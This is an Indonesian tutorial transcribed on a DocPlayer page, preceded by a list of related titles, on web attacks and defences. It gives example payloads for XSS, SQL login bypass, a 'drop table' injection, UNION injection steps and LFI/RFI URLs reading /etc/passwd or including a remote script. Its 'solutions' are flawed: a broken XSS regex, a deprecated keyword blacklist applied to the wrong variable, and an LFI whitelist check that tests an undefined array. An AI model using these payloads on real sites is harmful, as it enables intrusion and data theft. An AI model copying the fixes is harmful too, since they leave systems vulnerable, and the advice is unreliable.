PROTECTING WEBSITES FROM COMMON ATTACKS

dokumen-dokumen yang mirip
BAB 1 PENDAHULUAN. 1.1 Latar Belakang

Xcode Intensif Training. Advanced ethical web. hacking & security

Xcode Intensif Training. Ethical Web hacking & Security ~ Advanced

Ahmad Muammar W. K.

rancang bangun aplikasi web vulnerability scanner terhadap kelemahan sql injection dan xss menggunakan java

BAB 1 PENDAHULUAN. 1.1 Latar Belakang

Pencari Celah Keamanan pada Aplikasi Web

Presented by z3r0byt3 Disusun oleh the_day & y3dips

IMPLEMENTASI KEAMANAN APLIKASI WEB DENGAN WEB APPLICATION FIREWALL

Bab 4 Hasil dan Pembahasan

Secara umum, eksploit dapat dibagi atas dua jenis, yaitu eksploit lokal (local exploit), dan eksploit remote (remote exploit).

Analisis Penanganan SQL Injection pada Basis Data MySQL dengan Framework Code Igniter dan PHP

BAB III ANALISIS DAN PERANCANGAN

Methods of Manual Penetration Testing (Actual Exploit)

Form Mampu membuat form dan dan mengirim data ke halaman lain Pengaturan Validasi dan keamanan form. Sesi 5

TUTORIAL ANTI INJECTION 1. SCRIPT CODE LOGIN ANTI SQL INJECTION. Materi asli dari Masinosinaga baca dibawah ini:

BAB 1 PENDAHULUAN. 1.1 Latar Belakang Masalah

TUGAS KELOMPOK SECURITY COMPUTER TOOL HACKING SQL INJECTION

PISHING DENGAN TEKNIK DNS SPOFFING

Riska Kurnianto Abdullah NRP :

Tips Keamanan Aplikasi Web PHP & MySQL

BAB I PENDAHULUAN. teknologi terkini. Tukar menukar surat elektronik (surel) dan juga keberadaan dari

PENDETEKSI CELAH KEAMANAN PADA APLIKASI WEB DENGAN PENETRATION TESTING MENGGUNAKAN DATA VALIDATION TESTING SKRIPSI INDRA M.

BAB IV. IMPLEMENTASI dan PENGUJIAN

MODUL PEMOGRAMAN WEB II STMIK IM BANDUNG MODUL PEMOGRAMAN WEB II. Oleh: CHALIFA CHAZAR. Chalifa Chazar edu.script.id

BAB 4 IMPLEMENTASI DAN EVALUASI

Hacking Website With SQL Injection

Implementasi Firewall IPTables Untuk Mencegah Serangan Terhadap Webserver TUGAS AKHIR

INTRUSION PREVENTION SYSTEM UNTUK APLIKASI BERBASIS WEB. Naskah Publikasi. diajukan oleh Rajif Agung Yunmar

Keamanan Data di dalam Cloud Storage

E-trik Ajax. Database MySQL. Dedi Alnas

BAB 1 PENDAHULUAN. berkomunikasi. Hal tersebut dapat dilakukan dengan hanya mengetik alamat ip address

KEAMANAN KOMPUTER APLIKASI HAVIJ KELOMPOK : BAGUS WAHYU SANTOSO KHAIRUL RAHMAN RENDY ZULIANSYAH

BAB I PENDAHULUAN. celah pada sebuah aplikasi atau pada sistem operasi windows itu. Local exploit dalah sebuah exploitasi yang hanya terjadi di

DAFTAR ISI. LEMBAR PENGESAHAN PEMBIMBING... iii. LEMBAR PENGESAHAN PENGUJI... iv. LEMBAR PERNYATAAN KEASLIAN... v. HALAMAN PERSEMBAHAN...

BAB IV HASIL DAN PEMBAHASAN

MODUL PRAKTIKUM BASIS DATA TEKNIK INFORMATIKA UIN SUNAN KALIJAGA YOGYAKARTA 2011 PENGENALAN DATABASE MYSQL

Membuat Aplikasi Tampil, Entri, Edit, Delete Mahasiswa

BAB IV HASIL DAN PEMBAHASAN

USER MANUAL SUB PORTAL PUBLIK BUMN

KINERJA APLIKASI CLIENT SERVER UNTUK SISTEM INFORMASI TUMBUH KEMBANG BALITA

DAFTAR ISI. LAPORAN TUGAS AKHIR... ii

Fungsi-fungsi MySql Fungsi mysql_connect. Bentuk: Membuat hubungan ke database MySQL yang terdapat pada suatu host.

MODUL 8 Insert, Update, & delete

BAB III ANALISIS DAN DESAIN SISTEM

BAB IV IMPLEMENTASI DAN PENGUJIAN

Perancangan Website Ujian. Teknik Elektro UNDIP Berbasis HTML

BAB II LANDASAN TEORI. diperlukan dalam pembangunan website e-commerce Distro Baju MedanEtnic.

STUDI DAN IMPLEMENTASI KEAMANAN WEBSITE MENGGUNAKAN OPEN WEB APPLICATION SECURITY PROJECT (OWASP) STUDI KASUS : PLN BATAM

MODUL PEMOGRAMAN WEB II STMIK IM BANDUNG MODUL PEMOGRAMAN WEB II. Oleh: CHALIFA CHAZAR. Chalifa Chazar edu.script.id

APLIKASI DETEKSI KELEMAHAN WEBSITE DENGAN MENGGUNAKAN METODE INJEKSI REMOTE FILE INCLUSION DAN LOCAL FILE INCLUSION SKRIPSI

BAB V IMPLEMENTASI DAN PENGUJIAN. Tahap implementasi akan dipersiapkan bagaimana RANCANG BANGUN PERANGKAT LUNAK BANTU PENDAFTARAN

Bagian 3 : Membuat Koneksi PHP dan My Sql pada Dreem weaver Site Definitions Pada Web Penjualan Dengan Dreamweaver CS6.

BAB IV HASIL DAN PEMBAHASAN

Mahasiswa mengetahui & memahami mengenai DML, DCL di SQL. (Isi_Field_1, Isi_Field_2,, Isi_Field_N) ;

Jurnal Ilmiah Komputer dan Informatika (KOMPUTA) 45 Edisi... Volume..., Bulan 20.. ISSN :

Tutorial Celah Keamanan Pada PHP Scripts. Oleh Ramdan Yantu

BAB IV IMPLEMENTASI DAN UJI COBA SISTEM. antarmuka dan GUI, digunakan aplikasi Macromedia Dreamweaver 8.0

BAB IV HASIL DAN PEMBAHASAN

Pertemuan Ke-13 (PHP & MYSQL) Adi Widodo,S.Kom.,MMSI 1

VIEW : Tabel Virtual VIEW 5/29/2017

BAB IV IMPLEMENTASI SISTEM

Membuat Pencarian Data Mahasiswa

Keamanan Web Server. Pertemuan XI WEB HACKING

Modul 2 DreamWeaver MX Suendri, S.Kom

Bab 4 Pembahasan dan Hasil

Bab 1. Pendahuluan. 1.1 Latar Belakang

KAKAS UNTUK MENDETEKSI LUBANG KEAMANAN PADA APLIKASI WEB BERBASIS PHP DAN MYSQL YANG DAPAT DI EKSPLOITASI OLEH SERANGAN SQL INJECTION

WAP (3) Muhammad Zen S. Hadi, ST. MSc. WAP - The Wireless Application Protocol

Pemrograman Web. Koneksi dan Manipulasi Basis Data. Adam Hendra Brata

MySQL Databases. Dasar-dasar MySQL dan Implementasi MySQL kedalam pemrograman PHP. Jakarta, 16 April 2011 Oleh: M. Awaludin, S.Kom

Content Injection at Accounts Page that could Result Reflected Cross Site Scripting

Created by y3dips < >

BAB 2 LANDASAN TEORI

WELCOME MESSAGE WE STARTED AT. 10 March 2016 dimana komunitas ini didirikan

JURNAL TEKNIK POMITS Vol. 2, No. 1, (2013) ISSN: ( Print) 1

ANALISIS DAN PERANCANGAN

ADITYA WARDANA

Pemrograman PHP & MySQL

BAB IV IMPLEMENTASI DAN PENGUJIAN

PERANCANGAN LibraryUMS-CMS MENGGUNAKAN CODEIGNITER

Andi Dwi Riyanto, M.Kom

KEAHLIAN PEMROGAMAN JAVA

Pemrograman Web Berbasis Framework. Pertemuan 7 : Keamanan Aplikasi. Hasanuddin, S.T., M.Cs. Prodi Teknik Informatika UAD

BAB IV HASIL DAN UJI COBA

Daftar Isi. 2 P a g e

MODUL 7 CRUD (CREATE, READ, UPDATE,DELETE) dibawah ini adalah fungsi PHP yang akan digunakan untuk pembuatan CRUD

BAB IV IMPLEMENTASI DAN PENGUJIAN

BAB IV IMPLEMENTASI DAN PENGUJIAN

BAB IV HASIL DAN UJI COBA

CARA MENGGUNAKAN SELECT QUERY PADA MYSQL

TUTORIAL SQL INJECTION

BAB I PENDAHULUAN. hal yang wajib diketahui seorang web developer. Tanpa pengetahuan tersebut,

2.7.3 Modularisasi require() include() MySQL Keunggulan MySQL Sistem Server pada

BAB III ANALISA DAN DESAIN SISTEM

LAPORAN TUGAS BASIS DATA I

BAB I PENDAHULUAN. Perkembangan teknologi telah berkembang dengan sangat. pesat dan banyak terdapat layanan jasa informasi sampai penjualan

WAHYU KURNIAWAN CV. LOKOMEDIA

PENERAPAN KRIPTOGRAFI BASE64 UNTUK KEAMANAN URL (UNIFORM RESOURCE LOCATOR) WEBSITE DARI SERANGAN SQL INJECTION

Modul 4. Mengoperasikan Bahasa Pemrograman Data Description (SQL) Memahami penggunaan username dan password pada MySQL

Transkripsi:

PROTECTING WEBSITES FROM COMMON ATTACKS Oleh: Yudha Akbar Pramana Selamat datang kembali di YudhaAkbar.co.cc guys. Hm, kali ini aku mau bahas tentang masalah-masalah serangan pada web yang sering digunakan berserta cara pencegahanya. Ya biasanya serangan serangan tersebut menggunakan sebagian besar jenis defacement. Sebagian besar kesalahan terjadi pada pemrograman yang memungkinkan attacker untuk dapat menyusup ke dalam website. Aku juga ak... Hm, kali ini aku mau bahas tentang masalah-masalah serangan pada web yang sering digunakan berserta cara pencegahanya (copas dari yudhaakbar.co.cc). Ya biasanya serangan serangan tersebut menggunakan sebagian besar jenis defacement. Sebagian besar kesalahan terjadi pada pemrograman yang memungkinkan attacker untuk dapat menyusup ke dalam website. Aku juga akan menjelaskan lima (5) eksploitasi umum yang saya cantumkan di bawah ini, yaitu XSS, SQL injection, RFI dan LFI. Sebelumnya aku berterima kasih banyak kepada mas vyc0d telah membuat tutorial ini dan di posting pada IndonesianCoder.com, lalu forward ke kamu-kamu semua. hehee ^_^ oiya, untuk contact emailnya mas vyc0d adalah vyc0d@hackermail.com dan websitenya : http://vyc0d.blogspot.com ---------------------------------------------------------------------------------------------------------- Berikut Kontennya : [1] Cross Site Scripting [2] SQL Injection \_ Login Form Bypassing \_ UNION SQL Injection [3] File Inclusion

---------------------------------------------------------------------------------------------------------- [1] Cross Site Scripting Cross Site Scripting adalah jenis celah yang digunakan oleh attacker untuk menyuntikkan kode ke halaman web yang rentan terhadap serangan ini. Jika sebuah situs rentan terhadap cross site scripting, attacker kemungkinan besar akan mencoba untuk menyuntikkan situs dengan javascript berbahaya atau mencoba scam pengguna dengan menciptakan bentuk halaman web yang hampir sama untuk mendapatkan informasi. Example: http://www.situs.net/find.php?all="> *Solusi (javascript) : function RemoveBad(strTemp) { strtemp = strtemp.replace(/\< \> \" \' \% \; \( \) \& \+ \-/g,""); return strtemp; } [2] SQL Injection *\_ Login Form Bypassing Berikut adalah contoh kode yang dapat kita bisa bypass: index.html file: Password: Authenticate login.php file: Kita dapat bypass dengan menggunakan ' or '1=1', dan menjalankan "password = ''or '1=1'';". Atau attacker dapat juga dapat menghapus database dengan menjalankan "' drop table database; --".

*Solusi : Menggunakan mysql_real_escape_string Contoh: *\_ Union SQL Injection Union SQL injection adalah ketika pengguna menggunakan perintah UNION. Memeriksa celah dengan menambahkannya di akhir url "sebuah php?.id=". Jika terdapat error MySQL, situs tersebut kemungkinan besar besar rentan terhadap UNION SQL Injection. Attacker melanjutkan menggunakan ORDER BY untuk menemukan kolom, dan pada akhirnya, mereka menggunakan perintah UNION ALL SELECT. Contoh : http://www.situs.net/index.php?id=1' salah satu contoh pesan error: Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in... Setelah muncul pesan error,maka attacker melanjutkan aksinya ;)) http://www.situs.net/index.php?id=1 ORDER BY 1-- <-- No error. http://www.situs.net/index.php?id=1 ORDER BY 2-- <-- Muncul pesan error. Ini berarti hanya ada satu kolom http://www.situs.net/index.php?id=-1 UNION SELECT ALL version()-- <-- Memilih semua kolom dan menjalankan perintah version(). *Solusi : Tambahkan sesuatu seperti di bawah ini untuk mencegah SQL injection Union: $bug = "(delete) (update) (union) (insert) (drop) (http) (--) (/*) (select)"; $patch = eregi_replace($bug, "", $patch); [3] File Inclusion \_ Remote File Inclusion dan Local File Inclusion Remote File Inclusion adalah sebuah celah dimana situs mengizinkan attacker meng-includ file dari luar server. Local File Inclusion adalah sebuah celah dalam situs dimana attacker dapat mengakses semua file di dalam server dengan hanya melalui URL.

Contoh kode yang vulnerable : Beberapa contoh serangan : http://www.situs.net/page.php?page=../../../../../etc/passwd < contoh LFI http://www.situs.net/page.php?page=http://www.site.com/evilscript.txt? < contoh RFI *Solusi : Validate the input. <?php $page = $_GET['page']; $allowed = array('index.php', 'games.php', 'ip.php'); $iplogger = ('ip.php'); if (in_array($page, $pages)) { include $page; } else { include $iplogger; die("ip logged."); } Tentang Penulis Yudha Akbar Pramana

2024 © DocPlayer.info Pengaturan dan alat privasi | Ketentuan | Tanggapan